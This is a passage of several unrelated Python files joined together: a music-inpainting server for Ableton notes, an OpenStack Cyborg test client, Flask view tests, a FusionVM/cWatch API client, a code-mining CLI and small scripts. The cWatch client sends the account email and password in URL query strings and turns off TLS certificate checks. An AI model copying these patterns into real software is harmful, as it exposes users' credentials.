    None, yet they are compared/indexed unconditionally below — confirm that
    callers always pass a selected_region.
    """
    d = {
        'pitch': [],
        'time': [],
        'duration': [],
        'velocity': [],
        'muted': [],
    }
    mod = -1
    # pitch time duration velocity muted
    ableton_features = ['pitch', 'time', 'duration', 'velocity', 'muted']
    if selected_region is not None:
        start_time = selected_region['start']
        end_time = selected_region['end']
    # Walk the flat message list; after each 'note' marker the next five
    # values cycle through ableton_features.
    for msg in ableton_note_list:
        if msg == 'notes':
            pass
        elif msg == 'note':
            mod = 0
        elif msg == 'done':
            break
        else:
            if mod >= 0:
                d[ableton_features[mod]].append(msg)
                mod = (mod + 1) % 5
    # we now have to sort (by onset time, then descending pitch)
    l = [[p, t, d, v] for p, t, d, v in zip(d['pitch'], d['time'],
                                            d['duration'], d['velocity'])]
    l = sorted(l, key=lambda x: (x[1], -x[0]))
    d = dict(pitch=torch.LongTensor([x[0] for x in l]),
             time=torch.FloatTensor([x[1] for x in l]),
             duration=torch.FloatTensor([max(float(x[2]), 0.05) for x in l]),
             velocity=torch.LongTensor([x[3] for x in l]))
    # compute event_start, event_end
    # num_notes is the number of notes in the original sequence
    epsilon = 1e-4
    num_notes = d['time'].size(0)
    event_start, event_end = None, None
    if selected_region is not None:
        # first note at or after the region start
        i = 0
        flag = True
        while flag:
            if i == num_notes:
                event_start = num_notes
                break
            if d['time'][i].item() >= start_time - epsilon:
                flag = False
                event_start = i
            else:
                i = i + 1
        # first note at or after the region end
        i = 0
        flag = True
        while flag:
            if i == num_notes:
                event_end = num_notes
                break
            if i > d['time'].size(0):
                flag = False
                event_end = i
            elif d['time'][i].item() >= end_time - epsilon:
                flag = False
                event_end = i
            else:
                i = i + 1
    # multiply by tempo (beats -> seconds)
    d['time'] = d['time'] * seconds_per_beat
    d['duration'] = d['duration'] * seconds_per_beat
    # compute time_shift
    d['time_shift'] = torch.cat(
        [d['time'][1:] - d['time'][:-1],
         torch.zeros(1, )], dim=0)
    # Remove selected region and replace it with a placeholder
    # end_time must be the first starting time after the selected region
    if event_end < num_notes:
        end_time = d['time'][event_end].item() / seconds_per_beat
        # update_selected_region
        selected_region['end'] = end_time - 1e-2
    placeholder_duration = (end_time - start_time) * seconds_per_beat
    placeholder_duration = cuda_variable(torch.Tensor([placeholder_duration]))
    global data_processor
    placeholder, placeholder_duration_token = data_processor.compute_placeholder(
        placeholder_duration=placeholder_duration, batch_size=1)
    # time shift of the last note before the region, measured to region start
    if event_start > 0:
        last_time_shift_before = start_time * seconds_per_beat - d['time'][
            event_start - 1].item()
    # delete unnecessary entries in dict
    del d['time']
    before = {k: v[:event_start] for k, v in d.items()}
    after = {k: v[event_end:] for k, v in d.items()}
    global handler
    # format and pad
    # If we need to pad "before"
    if event_start < data_processor.num_events_before:
        before = {k: t.numpy() for k, t in before.items()}
        before = handler.dataloader_generator.dataset.add_start_end_symbols(
            sequence=before,
            start_time=event_start - data_processor.num_events_before,
            sequence_size=data_processor.num_events_before)
        if event_start > 0:
            before['time_shift'][-1] = last_time_shift_before
        before = handler.dataloader_generator.dataset.tokenize(before)
        before = {k: torch.LongTensor(t) for k, t in before.items()}
        before = torch.stack(
            [before[e] for e in handler.dataloader_generator.features],
            dim=-1).long()
        before = cuda_variable(before)
        unused_before = before[:0]
    else:
        before = {k: t.numpy() for k, t in before.items()}
        before = handler.dataloader_generator.dataset.add_start_end_symbols(
            sequence=before, start_time=0, sequence_size=event_start)
        before['time_shift'][-1] = last_time_shift_before
        before = handler.dataloader_generator.dataset.tokenize(before)
        before = {k: torch.LongTensor(t) for k, t in before.items()}
        before = torch.stack(
            [before[e] for e in handler.dataloader_generator.features],
            dim=-1).long()
        before = cuda_variable(before)
        # keep only the model-sized tail as context; the rest is untouched
        unused_before, before = (before[:-data_processor.num_events_before],
                                 before[-data_processor.num_events_before:])
    # same for "after"
    num_notes_after = after['pitch'].size(0)
    # After cannot contain 'START' symbol
    after = {k: t.numpy() for k, t in after.items()}
    after = handler.dataloader_generator.dataset.add_start_end_symbols(
        sequence=after,
        start_time=0,
        sequence_size=max(num_notes_after, data_processor.num_events_after))
    after = handler.dataloader_generator.dataset.tokenize(after)
    after = {k: torch.LongTensor(t) for k, t in after.items()}
    after = torch.stack(
        [after[e] for e in handler.dataloader_generator.features],
        dim=-1).long()
    after = cuda_variable(after)
    after, unused_after = (after[:data_processor.num_events_after],
                           after[data_processor.num_events_after:])
    # room left for the generated region in the model's fixed-size sequence
    middle_length = (data_processor.dataloader_generator.sequences_size -
                     data_processor.num_events_before -
                     data_processor.num_events_after - 2)
    # add batch dim
    unused_before = unused_before.unsqueeze(0)
    before = before.unsqueeze(0)
    after = after.unsqueeze(0)
    unused_after = unused_after.unsqueeze(0)
    # create x: context + placeholder + start-of-decode symbol + empty middle
    x = torch.cat([
        before, placeholder, after,
        data_processor.sod_symbols.unsqueeze(0).unsqueeze(0),
        cuda_variable(
            torch.zeros(1, middle_length, data_processor.num_channels))
    ],
                  dim=1).long()
    # if "before" was padded
    if event_start < data_processor.num_events_before:
        # (then event_start is the size of "before")
        before = before[:, -event_start:]
        # slicing does not work in this case
        if event_start == 0:
            before = before[:, :0]
    # if "after" was padded:
    if num_notes_after < data_processor.num_events_after:
        after = after[:, :num_notes_after]
    # update clip start if necessary
    if clip_start > start_time:
        clip_start = start_time
    metadata_dict = dict(original_sequence=x,
                         placeholder_duration=placeholder_duration,
                         decoding_start=data_processor.num_events_before +
                         data_processor.num_events_after + 2)
    return x, metadata_dict, unused_before, before, after, unused_after, clip_start, selected_region
def tensor_to_ableton(tensor,
                      start_time,
                      beats_per_second,
                      expected_duration=None,
                      rescale=False):
    """
    convert back a tensor to ableton format.
    Then shift all notes by clip start
    Args:
        tensor (num_events, num_channels)):
        start_time: offset (in beats) added to every note onset
        beats_per_second: tempo conversion factor (seconds -> beats)
        expected_duration: target duration in seconds, used when rescale=True
        rescale: when True, stretch times so the sequence spans expected_duration
    Returns:
        (notes, track_duration): list of ableton note dicts and total length
    """
    num_events, num_channels = tensor.size()
    if num_events == 0:
        return [], 0
    # channels are ['pitch', 'velocity', 'duration', 'time_shift']
    notes = []
    tensor = tensor.detach().cpu()
    global handler
    index2value = handler.dataloader_generator.dataset.index2value
    # decode time shifts (channel 3) and accumulate into absolute onsets
    timeshifts = torch.FloatTensor(
        [index2value['time_shift'][ts.item()] for ts in tensor[:, 3]])
    time = torch.cumsum(timeshifts, dim=0)
    if rescale:
        actual_duration = time[-1].item()
        rescaling_factor = expected_duration / actual_duration
    else:
        rescaling_factor = 1
    # shift right by one (first note starts at 0), convert to beats, offset
    time = (torch.cat([torch.zeros(
        (1, )), time[:-1]], dim=0) * rescaling_factor * beats_per_second +
            start_time)
    for i in range(num_events):
        note = dict(pitch=index2value['pitch'][tensor[i, 0].item()],
                    time=time[i].item(),
                    duration=index2value['duration'][tensor[i, 2].item()] *
                    beats_per_second * rescaling_factor,
                    velocity=index2value['velocity'][tensor[i, 1].item()],
                    muted=0)
        notes.append(note)
    # NOTE(review): this calls .item() on the 'duration' stored above, which
    # only works if index2value['duration'][...] is a tensor scalar — confirm
    # the dataset's index2value value types.
    track_duration = time[-1].item() + (notes[-1]['duration'].item() *
                                        rescaling_factor * beats_per_second)
    return notes, track_duration
if __name__ == "__main__":
    # Start the click CLI, which asserts cmd == 'serve' and spawns the server.
    launcher()
# Response format
# {'id': '14', 'notes': ['notes', 10, 'note', 64, 0.5, 0.25, 100, 0, 'note', 64, 0.75, 0.25, 100, 0, 'note', 64, 1, 0.25, 100, 0, 'note', 65, 0.25, 0.25, 100, 0, 'note', 68, 1, 0.25, 100, 0, 'note', 69, 0, 0.25, 100, 0, 'note', 69, 0.75, 0.25, 100, 0, 'note', 69, 1.25, 2, 100, 0, 'note', 70, 0.5, 0.25, 100, 0, 'note', 71, 0.25, 0.25, 100, 0, 'done'], 'duration': 4}
# Copyright 2019 Intel, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from oslo_serialization import jsonutils as json
from tempest import config
from tempest.lib import auth
from tempest.lib.common import rest_client

# Module-level tempest configuration and logger.
CONF = config.CONF
LOG = logging.getLogger(__name__)
class CyborgRestClient(rest_client.RestClient):
    """Client class for accessing the cyborg API."""

    DP_URL = '/device_profiles'

    def _response_helper(self, resp, body=None):
        # Decode the JSON payload only when a body is actually present.
        parsed = json.loads(body) if body else body
        return rest_client.ResponseBody(resp, parsed)

    def create_device_profile(self, body):
        """POST a new device profile."""
        payload = json.dump_as_bytes(body)
        resp, resp_body = self.post(self.DP_URL, body=payload)
        return self._response_helper(resp, resp_body)

    def delete_device_profile(self, name):
        """DELETE the device profile identified by *name*."""
        resp, resp_body = self.delete(self.DP_URL + "/" + name)
        return self._response_helper(resp, resp_body)

    def list_device_profile(self):
        """GET all device profiles."""
        resp, resp_body = self.get(self.DP_URL)
        return self._response_helper(resp, resp_body)
def get_auth_provider(credentials, scope='project'):
    """Build and initialise a tempest auth provider for *credentials*.

    Keystone v3 credentials get the v3 provider/endpoint; anything else
    falls back to Keystone v2.
    """
    default_params = {
        'disable_ssl_certificate_validation':
            CONF.identity.disable_ssl_certificate_validation,
        'ca_certs': CONF.identity.ca_certificates_file,
        'trace_requests': CONF.debug.trace_requests,
    }
    if isinstance(credentials, auth.KeystoneV3Credentials):
        provider_cls = auth.KeystoneV3AuthProvider
        auth_url = CONF.identity.uri_v3
    else:
        provider_cls = auth.KeystoneV2AuthProvider
        auth_url = CONF.identity.uri
    provider = provider_cls(credentials, auth_url,
                            scope=scope,
                            **default_params)
    provider.set_auth()
    return provider
|
"""Message View tests."""
# run these tests like:
#
# FLASK_ENV=production python -m unittest test_message_views.py
import os
from unittest import TestCase
from models import db, connect_db, Message, User, Follows
# BEFORE we import our app, let's set an environmental variable
# to use a different database for tests (we need to do this
# before we import our app, since that will have already
# connected to the database
os.environ['DATABASE_URL'] = "postgresql:///warbler-test"
from app import app, CURR_USER_KEY, do_logout
db.create_all()
# Don't have WTForms use CSRF at all, since it's a pain to test
app.config['WTF_CSRF_ENABLED'] = False
class UserViewTestCase(TestCase):
    """Tests for the app's user-facing view functions."""

    def setUp(self):
        """Reset the tables and create one known test user."""
        User.query.delete()
        Message.query.delete()
        Follows.query.delete()
        self.client = app.test_client()
        self.testuser = User.signup(username="testuser",
                                    email="test@test.com",
                                    password="testuser",
                                    image_url=None)
        db.session.commit()

    def test_home_(self):
        """Does the home route return the home page with logged in user"""
        # Mimic a logged-in user by seeding the session directly.
        with self.client as client:
            with client.session_transaction() as session:
                session[CURR_USER_KEY] = self.testuser.id
            response = client.get('/')
            self.assertEqual(response.status_code, 200)

    def test_signup(self):
        """Can the user signup properly"""
        with self.client as client:
            payload = {
                'username': 'test_signup',
                'password': '123456',
                'email': 'test@email.com',
            }
            response = client.post('/signup', data=payload)
            # successful signup redirects
            self.assertEqual(response.status_code, 302)
            user = User.authenticate(username='test_signup', password='123456')
            self.assertTrue(user != False)

    def test_login(self):
        """Can the user login properly"""
        # do_logout()
        with self.client as client:
            payload = {
                'username': 'test_user',
                'password': 'testuser',
            }
            response = client.post('/login', data=payload)
            self.assertEqual(response.status_code, 200)
            self.assertIn(b'testuser', response.data.lower())

    def test_logout(self):
        """Can the user logout properly"""
        with self.client as client:
            response = client.get('/logout', follow_redirects=True)
            self.assertEqual(response.status_code, 200)
            self.assertIn(b'new to warbler?', response.data.lower())

    def test_delete_user(self):
        """Can the user delete their account"""
        with self.client as client:
            with client.session_transaction() as session:
                session[CURR_USER_KEY] = self.testuser.id
            response = client.post('/users/delete')
            self.assertEqual(response.status_code, 302)
            self.assertIsNone(User.query.get(self.testuser.id))
|
import os
import string
import sys
import requests
import json
from xml.etree import ElementTree
class cwatchAPI(object):
    """Thin client for the FusionVM/cWatch APIs.

    Wraps two API generations: the JSON REST v2 endpoint (basic auth) and the
    legacy XML endpoint that authenticates via query-string credentials.
    """
    def __init__(self, usr, passwd):
        self.sess = requests.session()
        # REST v2 base URL
        self.url = 'https://www.fusionvm.com/rest/v2/api/'
        # legacy API base URL
        self.url2 = 'https://api.fusionvm.com/'
        self.usr = usr
        self.passwd = passwd
    def getData(self, v, url):
        """Fetch raw response content; v selects the API generation ("1"/"2")."""
        ndata = ""
        if v == "2":
            # REST v2 with basic auth; TLS verification is disabled
            data = self.sess.get(self.url + url, auth=(self.usr,self.passwd), verify=False)
        if v == "1":
            data = self.sess.get(self.url2 + url)
        # NOTE(review): accumulating iter_content chunks into a str only works
        # on Python 2 — on Python 3 the chunks are bytes and `str += bytes`
        # raises TypeError. Confirm the target interpreter.
        for i in data.iter_content(chunk_size=1024):
            if i:
                ndata += i
        return ndata
    def getXml(self, v, url):
        """Fetch and parse an XML response into an ElementTree element."""
        ndata = self.getData(v,url)
        #print ndata
        data = ElementTree.fromstring(ndata)
        return data
    def getJson(self, v, api):
        """Fetch and parse a JSON response."""
        data = json.loads(self.getData(v,api))
        return data
    def clientstats(self):
        data = self.getJson("2",'clientstats')
        return data
    def exposurestats(self):
        data = self.getJson("2",'exposurestats')
        return data
    def vmserverstats(self):
        data = self.getJson("2",'vmserverstats')
        return data
    def apicompany(self):
        data = self.getJson("2",'Company')
        return data
    def apijobs(self, args=None):
        # With no args list all jobs, otherwise fetch a single job by id.
        if not args:
            data = self.getJson("2",'jobs')
        else:
            data = self.getJson("2",'jobs/%s' % args)
        return data
    #API DOENST WORK YET FOR CW
    def apinodes(self, id):
        data = self.getJson("2",'Nodes/nodeid=%s' % id)
        return data
    def apiclientstats(self, id):
        data = self.getJson("2",'ClientStats/nodeid=%s' % id)
        return data
    def apitrends(self, id, months):
        data = self.getJson("2",'ClientStats/vulntrends?nodeid=%s&numberPriorMonths=%s' % (id,months))
        return data
    def report(self, mtype="list", args=""):
        """Legacy report API: mtype is 'list', 'queue' or 'download'."""
        #startdata,enddate,hoursback,companyid
        if mtype == "list":
            if args != "":
                data = self.getXml("1",'/report/list.aspx?emailaddress=%s&password=%s&%s' % (self.usr,self.passwd,args))
            else:
                data = self.getXml("1",'/report/list.aspx?emailaddress=%s&password=%s' % (self.usr,self.passwd))
        #jobid,seqnumber
        if mtype == "queue":
            data = self.getXml("1",'/report/queue.aspx?emailaddress=%s&password=%s&%s' % (self.usr,self.passwd,args))
        #guid
        if mtype == "download":
            # download returns raw bytes, not XML
            data = self.getData("1",'/report/download.aspx?emailaddress=%s&password=%s&%s' % (self.usr,self.passwd,args))
        return data
    def mssplist(self):
        """Return [{'Name': ..., 'ID': ...}] for every MSSP company."""
        data = self.getXml("1",'/mssp/company_list.aspx?emailaddress=%s&password=%s' % (self.usr,self.passwd))
        lst = data.findall("Companies/Company")
        c = []
        for i in lst:
            d = {"Name":"","ID":""}
            d["Name"] = i.find("CompanyName").text
            d["ID"] = i.attrib.get("CompanyID")
            c.append(d)
            d = ""
        return c
    #doesnt seem to work
    def vmserverlist(self, comid):
        """Return [{'Name': ..., 'ID': ...}] for the company's VM servers."""
        data = self.getXml("1",'/company/vmservers_list.aspx?emailaddress=%s&password=%s&companyid=%s' % (self.usr,self.passwd,comid))
        lst = data.findall("VMServers/VMServer")
        c = []
        for i in lst:
            d = {"Name":"","ID":""}
            d["Name"] = i.find("VMServerName").text
            d["ID"] = i.attrib.get("VMServerID")
            c.append(d)
            d = ""
        return c
    def job(self, mtype="status", jobid=""):
        """Legacy job control: mtype is 'status', 'start', 'pause' or 'stop'."""
        #need to add create function
        if mtype == "status":
            data = self.getXml("1",'/job/status.aspx?emailaddress=%s&password=%s&jobid=%s' % (self.usr,self.passwd,jobid))
        if mtype == "start":
            data = self.getXml("1",'/job/start.aspx?emailaddress=%s&password=%s&jobid=%s' % (self.usr,self.passwd,jobid))
        if mtype == "pause":
            data = self.getXml("1",'/job/pause.aspx?emailaddress=%s&password=%s&jobid=%s' % (self.usr,self.passwd,jobid))
        if mtype == "stop":
            data = self.getXml("1",'/job/stop.aspx?emailaddress=%s&password=%s&jobid=%s' % (self.usr,self.passwd,jobid))
        return data
    def xsd(self, mtype):
        data = self.getXml("1",'/xsd.aspx?type=%s' % mtype)
        return data
    def getCompanyNodeID(self, cn):
        """Look up a company's NodeId by exact name; None when not found."""
        nata = self.apicompany()
        for i in nata:
            if cn == i["Name"]:
                return i["NodeId"]
    def getCompanyID(self, cn):
        """Look up a company's Id by exact name; None when not found."""
        ndata = self.apicompany()
        for i in ndata:
            if cn == i["Name"]:
                return i["Id"]
    def getPreReport(self, cn):
        """Collect job/sequence report metadata for the company named *cn*."""
        fd = []
        data = {"seq":[]}
        id = self.getCompanyID(cn)
        if id == None:
            return None
        else:
            ls = self.report(mtype="list",args="companyid=%s" % id)
            for b in ls.iter(tag = "Job"):
                data["id"] = b.attrib.get("ID")
                data["name"] = b.attrib.get("Name")
                for c in b.iter(tag="Sequence"):
                    mylist = {}
                    mylist["id"] = c.attrib.get("ID")
                    mylist["start"] = c[0].text
                    mylist["end"] = c[1].text
                    data["seq"].append(mylist)
                fd.append(data)
                data = {"seq":[]}
            return fd
    def getReportQueue(self, jid, sid):
        """Queue a report and return its request key."""
        ls = self.report(mtype="queue",args="jobid=%s&seqnumber=%s" % (jid,sid))
        return ls.find("RequestKey").text
    def getReport(self, guid):
        """Download a previously queued report by its guid."""
        ls = self.report(mtype="download",args="guid=%s" % guid)
        return ls
|
# Ticker symbols to drop from the dataset. Duplicates ('HKG50', 'CELG',
# 'AKS') are preserved exactly as in the original list.
symb_rem = (
    'AABA DJ30 HKG50 SGCG.DE HKG50 ETO.L SHPG CELG ECA AKS LK UTX AKRX FTR '
    'JCP BRK.B GNC ASNA CHK SPN OGZDL.RU AGN MYL WUBA SE.ST HTZ DF XLM TMK '
    'CHINA50 NSDQ100 KVW.NV AUS200 GEBN.ZU CYBG.L DLPH WORKS AMTD ETFC CELG AKS '
    'USDPLN HMMJ DSNKY TVIX'
).split()
print('\nsymbols to be removed')
print(symb_rem)
|
import time
# Demo input: the integers 1..5 in descending order, i.e. [5, 4, 3, 2, 1].
n = sorted(range(1, 6), reverse=True)
def insertionSort(n):
    """Sort list ``n`` in place with insertion sort and return it.

    Prints the list state after each outer pass (same trace as the
    original shift-based implementation; equal elements stay stable).
    """
    for idx in range(1, len(n)):
        current = n.pop(idx)
        # Scan left for the insertion point of ``current``.
        pos = idx
        while pos > 0 and current < n[pos - 1]:
            pos -= 1
        n.insert(pos, current)
        print("ARRAY : {0}".format(n))
    return n
# Time the demo sort and show the list before/after (same output text).
start = time.perf_counter()
print(f"ARRAY BEFORE SORT : {n}")
print(f"ARRAY AFTER SORT : {insertionSort(n)}")
print()
print(f"Time needed : {time.perf_counter() - start}")
|
import json
import argparse
from abstraction.abstraction import AbstractionManager
from dataset_creation.dataset_mining import DatasetMining
from token_extraction.token_extraction import TokenExtraction
from utils.settings import init_global
def read_file(filepath): # read generic file
    """Read a UTF-8 text file and return its lines without trailing CR/LF.

    On any read error the error is printed and an empty list is returned
    (deliberate best-effort behavior, preserved from the original).
    """
    try:
        with open(filepath, encoding="utf-8") as handle:
            lines = [line.rstrip("\n").rstrip("\r") for line in handle]
    except Exception as e:
        print("Error ReadFile: " + str(e))
        lines = []
    return lines
def process_json_file(filepath: str, start: int, end: int, do_abstraction: bool = False):
    """Clone and analyze the repositories listed in a JSON results file.

    filepath: path to a file whose first line is a JSON object with an
        "items" list of {"name", "lastCommitSHA"} repository records.
    start/end: slice bounds selecting which items to process.
    do_abstraction: forwarded to Repo; abstracts methods during the check.

    Each repo is cloned into "cloning_folder", its files and methods are
    scanned via check_conditions(), and results are exported via Store.
    Per-repo failures are printed and skipped (best-effort loop).
    """
    json_file = filepath
    # The whole JSON document is expected on the first line of the file.
    file_data = read_file(json_file)
    data = json.loads(file_data[0])
    items = (data["items"])[start:end]
    print(len(items))
    # for i, item in enumerate(items):
    # print(i, item)
    file_name = "results.json"
    # Project imports are done lazily here (presumably to avoid import
    # cycles / startup cost -- TODO confirm).
    from utils.logger import Logger
    log = Logger("logger.log")
    from repoManager.repo import Repo
    from datetime import datetime
    print(datetime.now())
    for i, item in enumerate(items):
        try:
            print("Processed {} repositories of out {}".format(i + 1, len(items)))
            repo_name = item["name"]
            repo_commit = item["lastCommitSHA"]
            repo_url = "https://github.com/{}".format(repo_name)
            print(repo_url)
            # start + i keeps the repo's absolute index stable across slices.
            r = Repo(repo_name, repo_url, repo_commit, start + i, do_abstraction)
            r.clone_repo("cloning_folder")
            r.add_files()
            for f in r.files:
                for m in f.methods:
                    m.check_conditions()
            # Imported inside the loop; Python caches the module so this is
            # only a redundant lookup, not a re-import.
            from repoManager.store import Store
            store = Store()
            store.export_data(r)
        except Exception as e:
            # Broad catch keeps the batch running past any single bad repo.
            print("ERROR {}".format(e))
    print(datetime.now())
def analyse_results(parameter):
    """Analyze mined results and dump per-key counts to two text files.

    parameter: iterable of bounds unpacked into Analysis.count_file_and_method
        (min/max tokens and min/max lines, per main()'s --parameter flag).
    Writes "analysis.txt" and "analysis_global.txt" and echoes both dicts.
    """
    from result_analysis.analysis import Analysis
    a = Analysis()
    a.count_repos()
    result, result_global = a.count_file_and_method(*parameter)
    from repoManager.store import FileManager
    f = FileManager("analysis.txt")
    f.open_file_txt("w+")
    for k in result.keys():
        f.write_file_txt("{}: {}".format(k, result[k]))
    f.close_file()
    f = FileManager("analysis_global.txt")
    f.open_file_txt("w+")
    for k in result_global.keys():
        f.write_file_txt("{}: {}".format(k, result_global[k]))
    f.close_file()
    print(result)
    print(result_global)
def abstract_results(parameter):
    """Abstract all mined repositories using the given bound parameters."""
    manager = AbstractionManager(*parameter)
    manager.abstract_mined_repos()
def export_query(parameter):
    """Export all mined methods to a SQL file using the given bound parameters."""
    miner = DatasetMining(*parameter)
    miner.export_dataset_sql()
def extract_tokens(parameter):
    """Tokenize the mined repositories using the given bound parameters."""
    extractor = TokenExtraction(*parameter)
    extractor.tokenized_mined_repos()
def export_mask():
    """Export all masked files through the repoManager Store."""
    # Local import kept as in the original (avoids import cost at module load).
    from repoManager.store import Store
    Store().export_mask_files()
def fix_condition_id():
    '''
    In the first version of the tool, we saved a wrong ID field for conditions.
    With this code we can fix this bug
    '''
    from repoManager.store import FileManager
    import utils.settings as settings
    import os
    import shutil
    '''
    using all csv file generated during methods and conditions abstraction, it is able to abstract all the repos
    '''
    # Walk the export tree: repo_info.csv -> per-repo file_info.csv ->
    # per-file method_info.csv -> per-method condition_info.csv, rewriting
    # each condition CSV so that ID becomes the row's positional index.
    f = FileManager("export/repo_info.csv")
    repo_dict = f.read_csv()
    repos_name = repo_dict["NAME"]
    repos_id = repo_dict["ID"]
    for id, name in zip(repos_id, repos_name):
        f = FileManager("export/{}/file_info.csv".format(id))
        file_dict = f.read_csv()
        # Empty dict means missing/empty CSV for this repo: skip it.
        if len(file_dict.keys()) == 0:
            continue
        file_ids = file_dict["ID"]
        settings.logger.info("logging repo {} - {}".format(id, name))
        for file_id in file_ids:
            method_path = "export/{}/{}/method_info.csv".format(id, file_id)
            f = FileManager(method_path)
            method_dict = f.read_csv()
            if len(method_dict.keys()) == 0:
                continue
            method_ids = method_dict["ID"]
            settings.logger.info("logging file {}".format(file_id))
            for method_id in method_ids:
                condition_path = "export/{}/{}/{}/condition_info.csv".format(id, file_id, method_id)
                f = FileManager(condition_path)
                condition_dict = f.read_csv()
                if len(condition_dict.keys()) == 0:
                    continue
                # Keep a one-time backup of the original CSV so the fix is
                # recoverable; re-running does not clobber the backup.
                if not os.path.exists(condition_path + "__BACKUP"):
                    shutil.copy(condition_path, condition_path + "__BACKUP")
                fields_condition = ["ID", "START", "END", "IS_OK", "TYPE"]
                c = FileManager(condition_path)
                # we want to force the creation of the header (the file already exists so we'll skip the header otherwise)
                c.open_file_csv("w+", fields_condition, force_write_header=True)
                num_conditions = len(condition_dict["ID"])
                for i in range(num_conditions):
                    values_conditions = list()
                    for field in fields_condition:
                        values_conditions.append(condition_dict[field][i])
                    # The fix itself: overwrite the stored (wrong) ID with the
                    # row index.
                    values_conditions[0] = str(i)
                    dict_row = dict()
                    for x, y in zip(fields_condition, values_conditions):
                        dict_row[x] = y
                    c.write_file_csv(dict_row)
                c.close_file()
def T5_pretrain(parameter, num_max):
    """Create the T5 pre-training files, capping methods per repo at ``num_max``."""
    miner = DatasetMining(*parameter, num_max)
    miner.export_dataset_T5_pretrain()
def main():
    """CLI entry point: parse flags and dispatch to the requested pipeline step.

    Steps (mutually combinable): -c clone+check conditions, -a analysis,
    -abs abstraction, -exp SQL export, -t token extraction, -m mask export,
    -fix condition-ID repair, -t5_pretrain T5 dataset creation.
    The shared -p parameter string "minTok_maxTok_minLine_maxLine" is parsed
    for all steps; "none" in any slot falls back to the default bound.
    """
    init_global("logger.log")
    parser = argparse.ArgumentParser()
    parser.add_argument("-s", "--start", type=int, default=0,
                        help="The start index for repositories to process")
    parser.add_argument("-e", "--end", type=int, default=999999,
                        help="The end index for repositories to process")
    parser.add_argument("-f", "--filepath", type=str, default="json_data/results.json",
                        help="The path of json file")
    parser.add_argument("-c", "--conditions", action="store_true",
                        help="clone the repositories in the json @filepath and check for all conditions")
    parser.add_argument("-a", "--analysis", action="store_true",
                        help="analyze the results")
    parser.add_argument("-do_abstraction_during_check", "--do_abstraction_during_check", action="store_true",
                        help="abstract methods during condition processing")
    parser.add_argument("-abs", "--abstract", action="store_true",
                        help="abstract methods based on repo_info.csv and parameters (see --parameter)")
    parser.add_argument("-exp", "--export_query", action="store_true",
                        help="export all methods in a sql file")
    parser.add_argument("-m", "--mask", action="store_true",
                        help="export all masked files")
    parser.add_argument("-fix", "--fix", action="store_true",
                        help="fix condition file (wrong ID originally reported)")
    parser.add_argument("-t5_pretrain", "--t5_pretrain", action="store_true",
                        help="create files for T5 pretrain")
    parser.add_argument("-num_max", "--num_max", type=int, default=1500,
                        help="maximum number of methods extracted from the same repo for T5_pretrain")
    parser.add_argument("-p", "--parameter", type=str, default="0_9999999_0_9999999",
                        help="default parameters for analysis and abstraction. You have to write min number of tokens, max number of tokens,"
                             "min number of lines and max number of lines, separated by a underscore(_). If you do not want to specify"
                             "one of the parameters, put None")
    parser.add_argument("-t", "--tokens", action="store_true",
                        help="save tokens")
    args = parser.parse_args()
    if args.conditions:
        # -c -s 4 -e 7 -f json_data/results.json
        process_json_file(args.filepath, args.start, args.end, args.do_abstraction_during_check)
    # The -p string is parsed unconditionally, even for steps that ignore it.
    parameter_input = args.parameter.split("_")
    if len(parameter_input) != 4:
        print("ERROR: NUMBER OF PARAMETER IS NOT CORRECT")
        return
    parameter_default = [0, 9999999, 0, 9999999]
    parameter_list = list()
    for default, value in zip(parameter_default, parameter_input):
        # "none" (any case) selects the positional default bound.
        if value.lower() == "none":
            parameter_list.append(default)
            continue
        # NOTE(review): int(value) raises an uncaught ValueError for
        # non-numeric input -- confirm whether that is intended.
        curr = int(value)
        parameter_list.append(curr)
    if args.analysis:
        analyse_results(parameter_list)
    if args.abstract:
        # -abs -p 0_100_5_15
        abstract_results(parameter_list)
    if args.export_query:
        # -exp -p 0_100_5_15
        export_query(parameter_list)
    if args.tokens:
        extract_tokens(parameter_list)
    if args.mask:
        export_mask()
    if args.fix:
        fix_condition_id()
    if args.t5_pretrain:
        num_max=args.num_max
        T5_pretrain(parameter_list, num_max)
if __name__ == "__main__":
    main()
|
# Print 0..9, one per line, then a closing message.
# NOTE: the original mixed Python 3 ``print(i)`` with the Python-2-only
# statement ``print "Cero!"``, which is a SyntaxError on Python 3.
for i in range(10):
    print(i)
print("Cero!")
|
from pyhdf.SD import SD
import hdf4
import scipy.io
import numpy as np
import formatNum as fN
import re
import pandas as pd
import extract
import update
from collections import namedtuple
# Base directories for MISR aerosol product files and cached .mat data.
header_file_aerosol = '../../projects/aerosol/products/MIL2ASAE/'
header_data = '../../projects/aerosol/cache/data/'
# Lightweight record pairing per-pixel regression data ("reg") with the
# SMART lookup-table data ("smart").
PixelData = namedtuple('PixelData', 'reg smart')
def reg_smart(date, path, orbit, block, r):
    """Assemble the per-block regression inputs and neighbor structure.

    Loads the cached MATLAB regression struct, the per-component optical
    properties, the precision matrix Q for resolution ``r``, and the AOD
    field, then returns the full tuple of arrays used downstream.
    NOTE(review): the ``[0, 0]['field']`` indexing reflects scipy.io.loadmat's
    representation of MATLAB structs -- field layout must match the .mat file.
    """
    from constant import COMPONENT_NUM
    reg_dat = _reg_dat(date, path, orbit, block, r)
    optical_properties = particle(date, path, orbit)
    reg_is_used = reg_dat['reg'][0, 0]['reg_is_used'].T
    y, x = np.where(reg_is_used)
    # MATLAB indices are 1-based and column-major; convert to 0-based here.
    ind_used = np.ravel(reg_dat['reg'][0, 0]['ind_used'], order='F') - 1
    num_reg_used = reg_dat['reg'][0, 0]['num_reg_used'][0][0]
    channel_is_used = reg_dat['reg'][0, 0]['channel_is_used']
    min_equ_ref = reg_dat['reg'][0, 0]['min_equ_ref']
    mean_equ_ref = reg_dat['reg'][0, 0]['mean_equ_ref']
    eof = reg_dat['reg'][0, 0]['eof']
    max_usable_eof = reg_dat['reg'][0, 0]['max_usable_eof'] - 1
    ss = reg_dat['smart'][0, 0]['ss']
    ms = reg_dat['smart'][0, 0]['ms']
    Q = get_q(r)
    # Off-diagonal nonzeros of Q between two used regions define neighbor pairs.
    i2d, j2d = np.nonzero(Q)
    reg_is_used = np.ravel(reg_is_used)
